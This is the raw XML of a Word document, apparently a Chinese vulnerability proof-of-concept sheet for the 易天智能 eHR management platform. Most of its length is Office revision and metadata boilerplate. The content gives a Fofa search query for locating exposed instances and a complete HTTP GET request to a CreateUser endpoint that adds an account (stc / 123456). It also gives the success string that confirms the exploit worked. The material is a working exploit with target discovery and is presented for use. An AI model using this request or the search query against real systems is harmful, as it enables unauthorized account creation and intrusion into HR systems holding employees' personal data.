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38BC7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Fofa语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C15C5FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>body="易天智能eHR管理平台"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23639C9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漏洞POC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C8D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9E40FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GET /BaseManage/UserAPI/CreateUser?Account=stc&amp;Password=123456&amp;OuterID=888 HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37803D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Host: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2594E121">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A470053">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept: application/json, text/javascript, */*; q=0.01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16642D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E736E84">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate, br</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C54B52">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E32335">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B3BA0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Priority: u=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37EF2DF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响应代码特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5001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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44458A7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响应内容特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FA9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新用户添加成功</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="53461792">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1135"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A43D66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1MmRmNDMwNTY5OTYyNDM2N2VjMmMzMjg5NmJjMmQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="57FD1524"/>
    <w:rsid w:val="00B4047C"/>
    <w:rsid w:val="01732854"/>
    <w:rsid w:val="03384FAA"/>
    <w:rsid w:val="0E6B247B"/>
    <w:rsid w:val="0FF7FEA5"/>
    <w:rsid w:val="13DFAD20"/>
    <w:rsid w:val="1785A926"/>
    <w:rsid w:val="17E55D5F"/>
    <w:rsid w:val="1B97CA72"/>
    <w:rsid w:val="1E7A3B29"/>
    <w:rsid w:val="1F5F8E86"/>
    <w:rsid w:val="1F9F2A16"/>
    <w:rsid w:val="1FF3D49F"/>
    <w:rsid w:val="1FFF89E9"/>
    <w:rsid w:val="299F9458"/>
    <w:rsid w:val="29F99800"/>
    <w:rsid w:val="2BBE0817"/>
    <w:rsid w:val="2BFF4FB5"/>
    <w:rsid w:val="2BFF5176"/>
    <w:rsid w:val="2DB5FEFB"/>
    <w:rsid w:val="2DD27B69"/>
    <w:rsid w:val="2DD34CCD"/>
    <w:rsid w:val="2DD5B0C0"/>
    <w:rsid w:val="2EFF020B"/>
    <w:rsid w:val="2FBFBFFB"/>
    <w:rsid w:val="2FDF3766"/>
    <w:rsid w:val="2FFF4B20"/>
    <w:rsid w:val="326E1A35"/>
    <w:rsid w:val="33397BD2"/>
    <w:rsid w:val="37D79716"/>
    <w:rsid w:val="37EE8CD9"/>
    <w:rsid w:val="37FF2A93"/>
    <w:rsid w:val="37FF9796"/>
    <w:rsid w:val="387F2B36"/>
    <w:rsid w:val="3AB73EF0"/>
    <w:rsid w:val="3BDFC0B7"/>
    <w:rsid w:val="3C93886E"/>
    <w:rsid w:val="3CEF9AF8"/>
    <w:rsid w:val="3D79E67D"/>
    <w:rsid w:val="3EB31C8B"/>
    <w:rsid w:val="3EFC37B8"/>
    <w:rsid w:val="3EFFD843"/>
    <w:rsid w:val="3FBFCB8B"/>
    <w:rsid w:val="3FDEA6AA"/>
    <w:rsid w:val="3FEB3B3D"/>
    <w:rsid w:val="3FF80E9F"/>
    <w:rsid w:val="3FFCDE76"/>
    <w:rsid w:val="418F03C1"/>
    <w:rsid w:val="42FD4AE6"/>
    <w:rsid w:val="48D5008D"/>
    <w:rsid w:val="49E73956"/>
    <w:rsid w:val="4F4E1CE2"/>
    <w:rsid w:val="4FDCCC2A"/>
    <w:rsid w:val="4FF7A29A"/>
    <w:rsid w:val="4FFB5482"/>
    <w:rsid w:val="524E74B2"/>
    <w:rsid w:val="53E3D198"/>
    <w:rsid w:val="54FD31BC"/>
    <w:rsid w:val="55BF7986"/>
    <w:rsid w:val="55EBD72F"/>
    <w:rsid w:val="56E7394D"/>
    <w:rsid w:val="57771623"/>
    <w:rsid w:val="577BEC18"/>
    <w:rsid w:val="57FD1524"/>
    <w:rsid w:val="5AFD7C30"/>
    <w:rsid w:val="5B6E52F5"/>
    <w:rsid w:val="5BCDD2E7"/>
    <w:rsid w:val="5BD77C15"/>
    <w:rsid w:val="5BFD9482"/>
    <w:rsid w:val="5D7B3FBC"/>
    <w:rsid w:val="5DFB9FF8"/>
    <w:rsid w:val="5EEB849B"/>
    <w:rsid w:val="5EFD149D"/>
    <w:rsid w:val="5F7A13AB"/>
    <w:rsid w:val="5F7F0FB8"/>
    <w:rsid w:val="5FBF167B"/>
    <w:rsid w:val="5FED12B8"/>
    <w:rsid w:val="5FF1F784"/>
    <w:rsid w:val="5FF3E307"/>
    <w:rsid w:val="60238493"/>
    <w:rsid w:val="617F880E"/>
    <w:rsid w:val="61853D5A"/>
    <w:rsid w:val="63DBC652"/>
    <w:rsid w:val="65FF423B"/>
    <w:rsid w:val="6690A103"/>
    <w:rsid w:val="67E7CB12"/>
    <w:rsid w:val="67FF23E7"/>
    <w:rsid w:val="67FFF15E"/>
    <w:rsid w:val="684F53CA"/>
    <w:rsid w:val="6B54702E"/>
    <w:rsid w:val="6BBB4FAF"/>
    <w:rsid w:val="6BCDD5AF"/>
    <w:rsid w:val="6BDF1674"/>
    <w:rsid w:val="6BF3A92F"/>
    <w:rsid w:val="6D7E2FFF"/>
    <w:rsid w:val="6DB22A8C"/>
    <w:rsid w:val="6EBBFE9E"/>
    <w:rsid w:val="6EF70D5B"/>
    <w:rsid w:val="6EFB71B1"/>
    <w:rsid w:val="6EFE788C"/>
    <w:rsid w:val="6F6F2774"/>
    <w:rsid w:val="6FBD7CF2"/>
    <w:rsid w:val="6FE75C91"/>
    <w:rsid w:val="6FEE5854"/>
    <w:rsid w:val="7020421A"/>
    <w:rsid w:val="70621AAA"/>
    <w:rsid w:val="70B63205"/>
    <w:rsid w:val="72CFED86"/>
    <w:rsid w:val="73A9F55B"/>
    <w:rsid w:val="73C94D1C"/>
    <w:rsid w:val="73CBABE1"/>
    <w:rsid w:val="73DF1153"/>
    <w:rsid w:val="73FD6563"/>
    <w:rsid w:val="75FDE963"/>
    <w:rsid w:val="76BF7AB2"/>
    <w:rsid w:val="76C18528"/>
    <w:rsid w:val="76EB1E07"/>
    <w:rsid w:val="77E42D04"/>
    <w:rsid w:val="77FB1747"/>
    <w:rsid w:val="77FFE35A"/>
    <w:rsid w:val="785F0ADD"/>
    <w:rsid w:val="7956CD3D"/>
    <w:rsid w:val="79FFF76A"/>
    <w:rsid w:val="7A7BBABE"/>
    <w:rsid w:val="7A95D0EB"/>
    <w:rsid w:val="7AD64DD6"/>
    <w:rsid w:val="7AF94817"/>
    <w:rsid w:val="7B3BD7E9"/>
    <w:rsid w:val="7B7A30CF"/>
    <w:rsid w:val="7B7B0B69"/>
    <w:rsid w:val="7B995757"/>
    <w:rsid w:val="7BADE33A"/>
    <w:rsid w:val="7BD7F576"/>
    <w:rsid w:val="7BF7E1F0"/>
    <w:rsid w:val="7BF7ECA9"/>
    <w:rsid w:val="7BFF60DD"/>
    <w:rsid w:val="7CD5C5D6"/>
    <w:rsid w:val="7CF6A534"/>
    <w:rsid w:val="7CF7A1BC"/>
    <w:rsid w:val="7D39CCA9"/>
    <w:rsid w:val="7D7FDF5C"/>
    <w:rsid w:val="7DFFA47E"/>
    <w:rsid w:val="7E6E81D2"/>
    <w:rsid w:val="7E78C45A"/>
    <w:rsid w:val="7E7BCD1C"/>
    <w:rsid w:val="7E7E60FB"/>
    <w:rsid w:val="7E9F6F51"/>
    <w:rsid w:val="7EAE9A02"/>
    <w:rsid w:val="7EBDF6C6"/>
    <w:rsid w:val="7EFC1F47"/>
    <w:rsid w:val="7EFDDE9E"/>
    <w:rsid w:val="7F26BCBA"/>
    <w:rsid w:val="7F376BCC"/>
    <w:rsid w:val="7F3E08FE"/>
    <w:rsid w:val="7F3F55B7"/>
    <w:rsid w:val="7F6F3B96"/>
    <w:rsid w:val="7F765816"/>
    <w:rsid w:val="7FAFBBCC"/>
    <w:rsid w:val="7FB3A4A5"/>
    <w:rsid w:val="7FB7D77D"/>
    <w:rsid w:val="7FBB719F"/>
    <w:rsid w:val="7FBEA1CB"/>
    <w:rsid w:val="7FCE339B"/>
    <w:rsid w:val="7FD73586"/>
    <w:rsid w:val="7FDB36B4"/>
    <w:rsid w:val="7FDB6353"/>
    <w:rsid w:val="7FDF2293"/>
    <w:rsid w:val="7FDF396C"/>
    <w:rsid w:val="7FE69C24"/>
    <w:rsid w:val="7FED6077"/>
    <w:rsid w:val="7FED80C6"/>
    <w:rsid w:val="7FEFB24F"/>
    <w:rsid w:val="7FF2849D"/>
    <w:rsid w:val="7FF52585"/>
    <w:rsid w:val="7FFAE25C"/>
    <w:rsid w:val="7FFDE5C5"/>
    <w:rsid w:val="7FFE79BD"/>
    <w:rsid w:val="7FFF692E"/>
    <w:rsid w:val="7FFFCBF4"/>
    <w:rsid w:val="7FFFE085"/>
    <w:rsid w:val="8AB78574"/>
    <w:rsid w:val="903BCFC1"/>
    <w:rsid w:val="93F99F0F"/>
    <w:rsid w:val="967B4632"/>
    <w:rsid w:val="97AE0B38"/>
    <w:rsid w:val="99FFFF3F"/>
    <w:rsid w:val="9AFD16AC"/>
    <w:rsid w:val="9BCF7D2B"/>
    <w:rsid w:val="9CFEACB1"/>
    <w:rsid w:val="9F7CD18D"/>
    <w:rsid w:val="9F9720AE"/>
    <w:rsid w:val="9FAF2B7F"/>
    <w:rsid w:val="9FDAB30B"/>
    <w:rsid w:val="9FFDAEBF"/>
    <w:rsid w:val="9FFF3431"/>
    <w:rsid w:val="A1FD5A70"/>
    <w:rsid w:val="A27E69B0"/>
    <w:rsid w:val="A3D3B5AD"/>
    <w:rsid w:val="A6FDCE76"/>
    <w:rsid w:val="A8FB678E"/>
    <w:rsid w:val="AD5B8CAC"/>
    <w:rsid w:val="AEFED516"/>
    <w:rsid w:val="AF47AD03"/>
    <w:rsid w:val="AFB6F41D"/>
    <w:rsid w:val="B0974690"/>
    <w:rsid w:val="B47F41C3"/>
    <w:rsid w:val="B53FB2C1"/>
    <w:rsid w:val="B73E3741"/>
    <w:rsid w:val="B7FF178E"/>
    <w:rsid w:val="B96C5A42"/>
    <w:rsid w:val="BB6E64CC"/>
    <w:rsid w:val="BDEE8467"/>
    <w:rsid w:val="BDFF1BC3"/>
    <w:rsid w:val="BDFF3D9F"/>
    <w:rsid w:val="BE77A9F7"/>
    <w:rsid w:val="BF5D1E32"/>
    <w:rsid w:val="BFB37021"/>
    <w:rsid w:val="BFF7428B"/>
    <w:rsid w:val="BFFEEB34"/>
    <w:rsid w:val="BFFFD0DE"/>
    <w:rsid w:val="BFFFFF57"/>
    <w:rsid w:val="C35F894E"/>
    <w:rsid w:val="C3FE21AB"/>
    <w:rsid w:val="C725C9FC"/>
    <w:rsid w:val="CAF582E6"/>
    <w:rsid w:val="CBBE2114"/>
    <w:rsid w:val="CBFF7C50"/>
    <w:rsid w:val="CD6FAFC1"/>
    <w:rsid w:val="CFDEC857"/>
    <w:rsid w:val="CFEB1D61"/>
    <w:rsid w:val="CFFA9BEF"/>
    <w:rsid w:val="CFFF237C"/>
    <w:rsid w:val="D47BD7E0"/>
    <w:rsid w:val="D7344563"/>
    <w:rsid w:val="D7B732F6"/>
    <w:rsid w:val="D8BF77E5"/>
    <w:rsid w:val="D9AD4A21"/>
    <w:rsid w:val="D9BBCE23"/>
    <w:rsid w:val="DBA4F869"/>
    <w:rsid w:val="DD7D3824"/>
    <w:rsid w:val="DDDFE8FB"/>
    <w:rsid w:val="DE7FDD73"/>
    <w:rsid w:val="DEF9DEED"/>
    <w:rsid w:val="DFCF9D82"/>
    <w:rsid w:val="DFF54C4B"/>
    <w:rsid w:val="DFF63828"/>
    <w:rsid w:val="DFFF08E0"/>
    <w:rsid w:val="DFFFC62C"/>
    <w:rsid w:val="E2DF4477"/>
    <w:rsid w:val="E59FF217"/>
    <w:rsid w:val="E77B0D1F"/>
    <w:rsid w:val="E79B4105"/>
    <w:rsid w:val="E7FA619A"/>
    <w:rsid w:val="E9ED6298"/>
    <w:rsid w:val="EB3FABDA"/>
    <w:rsid w:val="EB9F36C9"/>
    <w:rsid w:val="EBF91784"/>
    <w:rsid w:val="ECB7AB14"/>
    <w:rsid w:val="ECFE5741"/>
    <w:rsid w:val="EDBFE5F3"/>
    <w:rsid w:val="EE3F6450"/>
    <w:rsid w:val="EF7D3A8B"/>
    <w:rsid w:val="EFF9367F"/>
    <w:rsid w:val="EFFAC8C3"/>
    <w:rsid w:val="EFFF8005"/>
    <w:rsid w:val="EFFFA52C"/>
    <w:rsid w:val="EFFFAB75"/>
    <w:rsid w:val="F0FAAA88"/>
    <w:rsid w:val="F1FDE6F5"/>
    <w:rsid w:val="F1FF2A92"/>
    <w:rsid w:val="F27D5C03"/>
    <w:rsid w:val="F27FCA1F"/>
    <w:rsid w:val="F297FCDB"/>
    <w:rsid w:val="F3BF0145"/>
    <w:rsid w:val="F3FBB573"/>
    <w:rsid w:val="F4B7A44D"/>
    <w:rsid w:val="F57112A3"/>
    <w:rsid w:val="F5AB2C7D"/>
    <w:rsid w:val="F5B36BE9"/>
    <w:rsid w:val="F5BF77B4"/>
    <w:rsid w:val="F5F72DF8"/>
    <w:rsid w:val="F6273DA8"/>
    <w:rsid w:val="F6690D7E"/>
    <w:rsid w:val="F6FBF995"/>
    <w:rsid w:val="F76B3DD1"/>
    <w:rsid w:val="F7778859"/>
    <w:rsid w:val="F77FFC25"/>
    <w:rsid w:val="F79E8BA0"/>
    <w:rsid w:val="F7D95AD9"/>
    <w:rsid w:val="F7DB388E"/>
    <w:rsid w:val="F7E28B87"/>
    <w:rsid w:val="F7F5C8C0"/>
    <w:rsid w:val="F7FF6A77"/>
    <w:rsid w:val="F8BF8985"/>
    <w:rsid w:val="F97FB8ED"/>
    <w:rsid w:val="F9962060"/>
    <w:rsid w:val="F9CB2FFD"/>
    <w:rsid w:val="F9E62CBF"/>
    <w:rsid w:val="F9F3E506"/>
    <w:rsid w:val="F9F7F0EB"/>
    <w:rsid w:val="F9FF8D69"/>
    <w:rsid w:val="FA324E87"/>
    <w:rsid w:val="FAFBD3D7"/>
    <w:rsid w:val="FAFDEFD2"/>
    <w:rsid w:val="FAFEF8A2"/>
    <w:rsid w:val="FB5F0364"/>
    <w:rsid w:val="FBA30457"/>
    <w:rsid w:val="FBCB6F0D"/>
    <w:rsid w:val="FBEC3635"/>
    <w:rsid w:val="FBFB645F"/>
    <w:rsid w:val="FC7F72EA"/>
    <w:rsid w:val="FCF06FFB"/>
    <w:rsid w:val="FD1EE484"/>
    <w:rsid w:val="FD4FF5F1"/>
    <w:rsid w:val="FD6AEB77"/>
    <w:rsid w:val="FD7F4FD3"/>
    <w:rsid w:val="FD7F867D"/>
    <w:rsid w:val="FDADAFFC"/>
    <w:rsid w:val="FDB75070"/>
    <w:rsid w:val="FDBE7BD1"/>
    <w:rsid w:val="FDBFAA8F"/>
    <w:rsid w:val="FDBFD45E"/>
    <w:rsid w:val="FDEE5A13"/>
    <w:rsid w:val="FDF1F0A9"/>
    <w:rsid w:val="FDFBD708"/>
    <w:rsid w:val="FDFFBEF1"/>
    <w:rsid w:val="FE7B1328"/>
    <w:rsid w:val="FE9BFA22"/>
    <w:rsid w:val="FEDE071F"/>
    <w:rsid w:val="FEEBBCF6"/>
    <w:rsid w:val="FEF27B8B"/>
    <w:rsid w:val="FEFA3455"/>
    <w:rsid w:val="FEFC3A5C"/>
    <w:rsid w:val="FEFC4869"/>
    <w:rsid w:val="FF4FFC4C"/>
    <w:rsid w:val="FF5DA5AC"/>
    <w:rsid w:val="FF679AA1"/>
    <w:rsid w:val="FF6D89C7"/>
    <w:rsid w:val="FF7BC27C"/>
    <w:rsid w:val="FF7CA208"/>
    <w:rsid w:val="FF7FA203"/>
    <w:rsid w:val="FFBC1160"/>
    <w:rsid w:val="FFBCCD69"/>
    <w:rsid w:val="FFBDD75C"/>
    <w:rsid w:val="FFBF78FF"/>
    <w:rsid w:val="FFBF7C90"/>
    <w:rsid w:val="FFDEFE55"/>
    <w:rsid w:val="FFDF9E60"/>
    <w:rsid w:val="FFDFA1FC"/>
    <w:rsid w:val="FFDFC11F"/>
    <w:rsid w:val="FFE4EA8F"/>
    <w:rsid w:val="FFEF119A"/>
    <w:rsid w:val="FFF11AE6"/>
    <w:rsid w:val="FFF3FA3D"/>
    <w:rsid w:val="FFF7BF3C"/>
    <w:rsid w:val="FFF9B26C"/>
    <w:rsid w:val="FFFB349C"/>
    <w:rsid w:val="FFFB3EFB"/>
    <w:rsid w:val="FFFC469D"/>
    <w:rsid w:val="FFFC8503"/>
    <w:rsid w:val="FFFD6A02"/>
    <w:rsid w:val="FFFDF767"/>
    <w:rsid w:val="FFFE2F17"/>
    <w:rsid w:val="FFFF0078"/>
    <w:rsid w:val="FFFFE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361</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>381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2024-03-07T08:56:00Z</dcterms:created>
  <dc:creator>路边菜贩子</dc:creator>
  <cp:lastModifiedBy>W.CONG</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-20T08:20:37Z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239BAF64848D2AE6A9B1B1659314282A_41</vt:lpwstr>
  </property>
</Properties>
</file>